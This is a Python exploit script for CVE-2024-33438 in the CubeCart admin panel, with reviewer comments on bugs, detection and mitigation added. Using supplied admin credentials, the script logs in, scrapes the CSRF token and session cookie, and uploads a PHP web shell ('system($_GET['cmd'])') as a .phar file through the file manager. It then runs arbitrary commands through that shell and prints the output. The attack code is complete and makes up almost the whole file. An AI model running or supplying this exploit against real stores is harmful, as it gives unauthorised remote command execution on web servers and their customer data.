CubeCart-CVE-2024-33438.py
#!/usr/bin/python3
import requests
import random
import re
import sys
# Startup banner; printed unconditionally, before any argument is inspected.
banner = """\n [] ,----.___
__||_/___ '.
/ O|| /|
/ "" / /
/________/ / launching exploit
|________|/ please wait...
"""
print(banner)
# Argument handling. The script requires exactly four positional arguments
# (admin page URL, username, password, command), i.e. len(sys.argv) == 5.
# NOTE(review): indentation was lost in this listing; each print()/sys.exit()
# pair directly after an `if` reads as the body of that `if`.
# NOTE(review): the account password is passed on the command line, so it
# ends up in shell history and is visible in the process list.
if len(sys.argv) == 1:
print("No arguments. Try '-h' or '--help' to understand how this exploit works.")
sys.exit()
if len(sys.argv) > 5:
print("Too many arguments. Try '-h' or '--help' to understand how this exploit works.")
sys.exit()
if len(sys.argv) < 5:
print("Not enough arguments. Try '-h' or '--help' to understand how this exploit works.")
sys.exit()
# NOTE(review): the count checks above exit for anything other than four
# arguments, so this help branch is only reached when '-h'/'--help' is
# followed by three further arguments; a bare '-h' prints "Not enough arguments".
if sys.argv[1].lower() == "-h" or sys.argv[1].lower() == "--help":
print("Usage: python3 CubeCart-CVE-2024-33438.py <URL> <username> <password> <command>\nExample: python3 CubeCart-CVE-2024-33438.py http://127.0.0.1/admin_0Kqnr9.php admin admin whoami\n")
sys.exit()
# Inputs and upload payload.
# URL is the admin page of the target (see the usage example), and a valid
# username/password is required: everything below runs as an authenticated
# admin-panel user, not as an anonymous visitor.
URL, username, password, cmd = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]
# The upload name is a random 32-bit integer rendered in decimal plus the
# `.phar` extension. Defender note: an all-digit `*.phar` file in an
# image/upload directory is a strong indicator worth alerting on.
filename = str(random.getrandbits(32)) + ".phar"
# Multipart form field `file` carrying a one-line PHP script that hands the
# `cmd` query parameter to system(). It only has an effect if the upload
# handler accepts the extension AND the web server runs `.phar` files in the
# upload directory as PHP -- presumably both are true on affected installs;
# verify against the CVE-2024-33438 advisory. Mitigation is to allowlist
# upload extensions and to disable script handlers for upload directories.
files = {'file': (filename, '<?php system($_GET[\'cmd\']) ?>')}
# Authentication phase (requests 1-3). None of the requests sets a timeout,
# so an unresponsive server blocks the script indefinitely.
# NOTE(review): indentation was lost in this listing; the print()/sys.exit()
# pair after the `if` below reads as its body.
# First request: fetch the admin login page and pull the anti-CSRF value out
# of the hidden `token` input (class `cc_session_token`).
print("[+] Trying to log into the application...")
req1 = requests.get(URL)
token_match = re.search(r'<input type="hidden" name="token" class="cc_session_token" value="([^"]+)', req1.text)
# NOTE(review): re.search() returns None when the field is absent (different
# markup, wrong URL); .group(1) then raises AttributeError.
mytoken = token_match.group(1)
# Second request: submit the login form. allow_redirects=False keeps the
# response to the POST itself, so its Set-Cookie header can be read directly.
payload = {"username": username, "password": password, "redir": f"{URL}+p?_g=login", "login": "Log In", "token": mytoken}
req2 = requests.post(URL, data=payload, allow_redirects=False)
all_cookies = req2.headers.get("Set-Cookie")
# The session cookie is located by its `CC_` name prefix; the name is then
# reused as a regex fragment to capture the value up to the next `;`.
# NOTE(review): all_cookies is None when no Set-Cookie header is returned,
# and the cookie name is interpolated into the pattern without re.escape().
session_cookie = re.search(r'CC'+'_([^=]+)', all_cookies)
session_cookie_name = 'CC_'+session_cookie.group(1)
session_cookie_value = re.search(r''+session_cookie_name+'=([^;]+)', all_cookies)
session_cookie_value = session_cookie_value.group(1)
# Third request: re-fetch the admin URL with the session cookie and treat a
# response shorter than 3000 bytes as "still on the login page".
# NOTE(review): this is a size heuristic, not a real authentication check;
# Content-Length can be missing (e.g. chunked responses), in which case
# int(None) raises TypeError.
req3 = requests.get(URL, cookies={session_cookie_name: session_cookie_value})
if int(req3.headers.get("Content-Length")) < 3000:
print("[!] Login failed. Exiting the exploit...")
sys.exit()
# Upload and execution phase (requests 4-6).
# NOTE(review): indentation was lost in this listing; the print()/sys.exit()
# pair after the `if` below reads as its body.
# Fourth request: authenticated multipart POST of the `.phar` file to the
# admin file manager (`?_g=filemanager`).
# Detection: an admin-panel upload whose filename ends in `.phar` (or any
# other extension the server maps to PHP) should not occur in normal use.
print("[+] Successful login. Uploading a simple web shell to the server...")
req4 = requests.post(URL+"?_g=filemanager", files=files, cookies={session_cookie_name: session_cookie_value})
# Fifth request: fetch `/images/source/` under the site root (everything
# before "/admin" in the supplied URL) without cookies and look for the
# uploaded name in the body. Presumably this relies on the server returning
# a directory index for that path -- confirm; disabling directory indexes
# removes this confirmation step but not the upload itself.
req5 = requests.get(URL.split("/admin")[0]+"/images/source/")
if filename not in req5.text:
print("[!] It wasn't possible to upload the web shell. Exiting the exploit...")
sys.exit()
# Sixth request: unauthenticated GET of the uploaded file with the command
# in the `cmd` query parameter; the response body is printed as the output.
# Detection: access-log entries for `/images/source/<digits>.phar?cmd=...`.
# Mitigation: deny script execution for the upload directory and apply the
# vendor fix for CVE-2024-33438.
# Forensics: nothing in this script deletes the uploaded file, so it remains
# in the upload directory after the run.
print("[+] Executing command...\n")
req6 = requests.get(URL.split("/admin")[0]+"/images/source/"+filename+"?cmd="+cmd)
print("Output: " + req6.text)